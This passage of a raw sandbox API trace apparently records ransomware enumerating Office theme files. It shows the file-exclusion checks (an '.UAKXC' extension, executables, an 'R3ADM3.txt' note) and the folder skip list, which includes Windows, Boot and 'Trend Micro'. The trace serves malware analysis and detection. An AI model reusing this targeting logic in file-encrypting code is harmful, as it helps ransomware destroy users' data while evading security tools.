(HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.303] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecdb0 [0158.303] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf346c0 [0158.304] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.304] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.304] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54abb600, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5c3cce0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x54abb600, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xc97ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pushpin.thmx", cAlternateFileName="PUSHPI~1.THM")) returned 1 [0158.304] lstrcmpW (lpString1="Pushpin.thmx", lpString2=".") returned 1 [0158.304] lstrcmpW (lpString1="Pushpin.thmx", lpString2="..") returned 1 [0158.304] StrStrIW (lpFirst="Pushpin.thmx", lpSrch=".UAKXC") returned 0x0 [0158.304] StrStrIW (lpFirst="Pushpin.thmx", lpSrch=".exe") returned 0x0 [0158.304] StrStrIW (lpFirst="Pushpin.thmx", lpSrch=".dll") returned 0x0 [0158.304] StrStrIW (lpFirst="Pushpin.thmx", lpSrch=".lnk") returned 0x0 [0158.304] StrStrIW (lpFirst="Pushpin.thmx", lpSrch=".sys") returned 0x0 [0158.304] StrStrIW (lpFirst="Pushpin.thmx", lpSrch=".msi") returned 0x0 [0158.304] StrStrIW (lpFirst="Pushpin.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.304] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e05c0 [0158.304] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.304] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.304] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.304] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.304] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.304] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e05c0 | out: hHeap=0xea0000) returned 1 [0158.304] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.304] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e05c0 [0158.304] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34758 [0158.304] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.304] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.304] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x633f56d0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x633f56d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x633f56d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0158.305] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0158.305] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0158.305] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0158.305] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0158.305] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0158.305] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0158.305] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0158.305] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0158.305] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0158.305] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81f86400, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5c62e40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x81f86400, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x106e8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Slipstream.thmx", cAlternateFileName="SLIPST~1.THM")) returned 1 [0158.305] lstrcmpW (lpString1="Slipstream.thmx", lpString2=".") returned 1 [0158.305] lstrcmpW (lpString1="Slipstream.thmx", lpString2="..") returned 1 [0158.305] StrStrIW (lpFirst="Slipstream.thmx", lpSrch=".UAKXC") returned 0x0 [0158.305] StrStrIW (lpFirst="Slipstream.thmx", lpSrch=".exe") returned 0x0 [0158.305] StrStrIW (lpFirst="Slipstream.thmx", lpSrch=".dll") returned 0x0 [0158.305] StrStrIW (lpFirst="Slipstream.thmx", lpSrch=".lnk") returned 0x0 [0158.305] StrStrIW (lpFirst="Slipstream.thmx", lpSrch=".sys") returned 0x0 [0158.305] StrStrIW (lpFirst="Slipstream.thmx", lpSrch=".msi") returned 0x0 [0158.305] StrStrIW (lpFirst="Slipstream.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.305] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e05e8 [0158.305] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.306] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.306] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.306] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.306] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.306] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e05e8 | out: hHeap=0xea0000) returned 1 [0158.306] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.306] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e05e8 [0158.306] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf347f0 [0158.306] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.306] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.306] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c23bc00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5c62e40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x2c23bc00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x124a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Solstice.thmx", cAlternateFileName="SOLSTI~1.THM")) returned 1 [0158.306] lstrcmpW (lpString1="Solstice.thmx", lpString2=".") returned 1 [0158.306] lstrcmpW (lpString1="Solstice.thmx", lpString2="..") returned 1 [0158.306] StrStrIW (lpFirst="Solstice.thmx", lpSrch=".UAKXC") returned 0x0 [0158.306] StrStrIW (lpFirst="Solstice.thmx", lpSrch=".exe") returned 0x0 [0158.306] StrStrIW (lpFirst="Solstice.thmx", lpSrch=".dll") returned 0x0 [0158.306] StrStrIW (lpFirst="Solstice.thmx", lpSrch=".lnk") returned 0x0 [0158.306] StrStrIW (lpFirst="Solstice.thmx", lpSrch=".sys") returned 0x0 [0158.306] StrStrIW (lpFirst="Solstice.thmx", lpSrch=".msi") returned 0x0 [0158.306] StrStrIW (lpFirst="Solstice.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.306] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0610 [0158.306] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.306] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.307] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.307] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.307] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.307] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0610 | out: hHeap=0xea0000) returned 1 [0158.307] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.307] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0610 [0158.307] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34888 [0158.307] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.307] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.307] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fb74300, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5c88fa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x2fb74300, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x10d83, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Technic.thmx", cAlternateFileName="TECHNI~1.THM")) returned 1 [0158.307] lstrcmpW (lpString1="Technic.thmx", lpString2=".") returned 1 [0158.307] lstrcmpW (lpString1="Technic.thmx", lpString2="..") returned 1 [0158.307] StrStrIW (lpFirst="Technic.thmx", lpSrch=".UAKXC") returned 0x0 [0158.307] StrStrIW (lpFirst="Technic.thmx", lpSrch=".exe") returned 0x0 [0158.307] StrStrIW (lpFirst="Technic.thmx", lpSrch=".dll") returned 0x0 [0158.307] StrStrIW (lpFirst="Technic.thmx", lpSrch=".lnk") returned 0x0 [0158.307] StrStrIW (lpFirst="Technic.thmx", lpSrch=".sys") returned 0x0 [0158.307] StrStrIW (lpFirst="Technic.thmx", lpSrch=".msi") returned 0x0 [0158.307] StrStrIW (lpFirst="Technic.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.307] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0638 [0158.307] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.307] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.307] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.307] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.308] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.308] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0638 | out: hHeap=0xea0000) returned 1 [0158.308] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.308] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0638 [0158.308] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34920 [0158.308] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.308] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.308] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59706a00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5c88fa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x59706a00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x15d75, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Thatch.thmx", cAlternateFileName="THATCH~1.THM")) returned 1 [0158.308] lstrcmpW (lpString1="Thatch.thmx", lpString2=".") returned 1 [0158.308] lstrcmpW (lpString1="Thatch.thmx", lpString2="..") returned 1 [0158.308] StrStrIW (lpFirst="Thatch.thmx", lpSrch=".UAKXC") returned 0x0 [0158.308] StrStrIW (lpFirst="Thatch.thmx", lpSrch=".exe") returned 0x0 [0158.308] StrStrIW (lpFirst="Thatch.thmx", lpSrch=".dll") returned 0x0 [0158.308] StrStrIW (lpFirst="Thatch.thmx", lpSrch=".lnk") returned 0x0 [0158.308] StrStrIW (lpFirst="Thatch.thmx", lpSrch=".sys") returned 0x0 [0158.308] StrStrIW (lpFirst="Thatch.thmx", lpSrch=".msi") returned 0x0 [0158.308] StrStrIW (lpFirst="Thatch.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.308] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0660 [0158.308] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.308] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.308] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.308] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.308] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.308] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0660 | out: hHeap=0xea0000) returned 1 [0158.309] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.309] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0660 [0158.323] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf349b8 [0158.323] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.323] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.323] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c9cf70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x603f4990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x603f4990, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Theme Colors", cAlternateFileName="THEMEC~1")) returned 1 [0158.323] lstrcmpW (lpString1="Theme Colors", lpString2=".") returned 1 [0158.323] lstrcmpW (lpString1="Theme Colors", lpString2="..") returned 1 [0158.323] StrStrIW (lpFirst="Theme Colors", lpSrch="tmp") returned 0x0 [0158.323] StrStrIW (lpFirst="Theme Colors", lpSrch="winnt") returned 0x0 [0158.323] StrStrIW (lpFirst="Theme Colors", lpSrch="temp") returned 0x0 [0158.324] StrStrIW (lpFirst="Theme Colors", lpSrch="thumb") returned 0x0 [0158.324] StrStrIW (lpFirst="Theme Colors", lpSrch="$Recycle.Bin") returned 0x0 [0158.324] StrStrIW (lpFirst="Theme Colors", lpSrch="$RECYCLE.BIN") returned 0x0 [0158.324] StrStrIW (lpFirst="Theme Colors", lpSrch="System Volume Information") returned 0x0 [0158.324] StrStrIW (lpFirst="Theme Colors", lpSrch="Boot") returned 0x0 [0158.324] StrStrIW (lpFirst="Theme Colors", lpSrch="Windows") returned 0x0 [0158.324] StrStrIW (lpFirst="Theme Colors", lpSrch="Trend Micro") returned 0x0 [0158.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0688 [0158.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.324] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.324] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.324] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0688 | out: hHeap=0xea0000) returned 1 [0158.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0688 [0158.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.324] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.324] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe5caf100, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5caf100, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Theme Effects", cAlternateFileName="THEMEE~1")) returned 1 [0158.324] lstrcmpW (lpString1="Theme Effects", lpString2=".") returned 1 [0158.324] lstrcmpW (lpString1="Theme Effects", lpString2="..") returned 1 [0158.324] StrStrIW (lpFirst="Theme Effects", lpSrch="tmp") returned 0x0 [0158.324] StrStrIW (lpFirst="Theme Effects", lpSrch="winnt") returned 0x0 [0158.324] StrStrIW (lpFirst="Theme Effects", lpSrch="temp") returned 0x0 [0158.324] StrStrIW (lpFirst="Theme Effects", lpSrch="thumb") returned 0x0 [0158.324] StrStrIW (lpFirst="Theme Effects", lpSrch="$Recycle.Bin") returned 0x0 [0158.325] StrStrIW (lpFirst="Theme Effects", lpSrch="$RECYCLE.BIN") returned 0x0 [0158.325] StrStrIW (lpFirst="Theme Effects", lpSrch="System Volume Information") returned 0x0 [0158.325] StrStrIW (lpFirst="Theme Effects", lpSrch="Boot") returned 0x0 [0158.325] StrStrIW (lpFirst="Theme Effects", lpSrch="Windows") returned 0x0 [0158.325] StrStrIW (lpFirst="Theme Effects", lpSrch="Trend Micro") returned 0x0 [0158.325] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e06b0 [0158.325] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.325] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.325] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.325] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.325] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.325] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e06b0 | out: hHeap=0xea0000) returned 1 [0158.325] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e06b0 [0158.325] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34a50 [0158.325] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.325] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528a9ed0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6187c750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6187c750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Theme Fonts", cAlternateFileName="THEMEF~1")) returned 1 [0158.325] lstrcmpW (lpString1="Theme Fonts", lpString2=".") returned 1 [0158.325] lstrcmpW (lpString1="Theme Fonts", lpString2="..") returned 1 [0158.325] StrStrIW (lpFirst="Theme Fonts", lpSrch="tmp") returned 0x0 [0158.325] StrStrIW (lpFirst="Theme Fonts", lpSrch="winnt") returned 0x0 [0158.325] StrStrIW (lpFirst="Theme Fonts", lpSrch="temp") returned 0x0 [0158.325] StrStrIW (lpFirst="Theme Fonts", lpSrch="thumb") returned 0x0 [0158.325] StrStrIW (lpFirst="Theme Fonts", lpSrch="$Recycle.Bin") returned 0x0 [0158.325] StrStrIW (lpFirst="Theme Fonts", lpSrch="$RECYCLE.BIN") returned 0x0 [0158.325] StrStrIW (lpFirst="Theme Fonts", lpSrch="System Volume Information") returned 0x0 [0158.326] StrStrIW (lpFirst="Theme Fonts", lpSrch="Boot") returned 0x0 [0158.326] StrStrIW (lpFirst="Theme Fonts", lpSrch="Windows") returned 0x0 [0158.326] StrStrIW (lpFirst="Theme Fonts", lpSrch="Trend Micro") returned 0x0 [0158.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e06d8 [0158.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.326] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.326] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.326] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e06d8 | out: hHeap=0xea0000) returned 1 [0158.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e06d8 [0158.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34ae8 [0158.326] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.326] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x334aca00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5c88fa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x334aca00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x2a23c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Trek.thmx", cAlternateFileName="TREK~1.THM")) returned 1 [0158.326] lstrcmpW (lpString1="Trek.thmx", lpString2=".") returned 1 [0158.326] lstrcmpW (lpString1="Trek.thmx", lpString2="..") returned 1 [0158.326] StrStrIW (lpFirst="Trek.thmx", lpSrch=".UAKXC") returned 0x0 [0158.326] StrStrIW (lpFirst="Trek.thmx", lpSrch=".exe") returned 0x0 [0158.326] StrStrIW (lpFirst="Trek.thmx", lpSrch=".dll") returned 0x0 [0158.326] StrStrIW (lpFirst="Trek.thmx", lpSrch=".lnk") returned 0x0 [0158.326] StrStrIW (lpFirst="Trek.thmx", lpSrch=".sys") returned 0x0 [0158.326] StrStrIW (lpFirst="Trek.thmx", lpSrch=".msi") returned 0x0 [0158.326] StrStrIW (lpFirst="Trek.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0700 [0158.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.327] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.327] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.327] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.327] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0700 | out: hHeap=0xea0000) returned 1 [0158.327] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0158.327] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0700 [0158.327] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd328 [0158.327] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0158.327] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.327] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36de5100, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5caf100, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x36de5100, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xfc70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Urban.thmx", cAlternateFileName="URBAN~1.THM")) returned 1 [0158.327] lstrcmpW (lpString1="Urban.thmx", lpString2=".") returned 1 [0158.327] lstrcmpW (lpString1="Urban.thmx", lpString2="..") returned 1 [0158.327] StrStrIW (lpFirst="Urban.thmx", lpSrch=".UAKXC") returned 0x0 [0158.327] StrStrIW (lpFirst="Urban.thmx", lpSrch=".exe") returned 0x0 [0158.327] StrStrIW (lpFirst="Urban.thmx", lpSrch=".dll") returned 0x0 [0158.327] StrStrIW (lpFirst="Urban.thmx", lpSrch=".lnk") returned 0x0 [0158.327] StrStrIW (lpFirst="Urban.thmx", lpSrch=".sys") returned 0x0 [0158.327] StrStrIW (lpFirst="Urban.thmx", lpSrch=".msi") returned 0x0 [0158.327] StrStrIW (lpFirst="Urban.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.327] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0728 [0158.327] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.327] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.327] RtlAllocateHeap 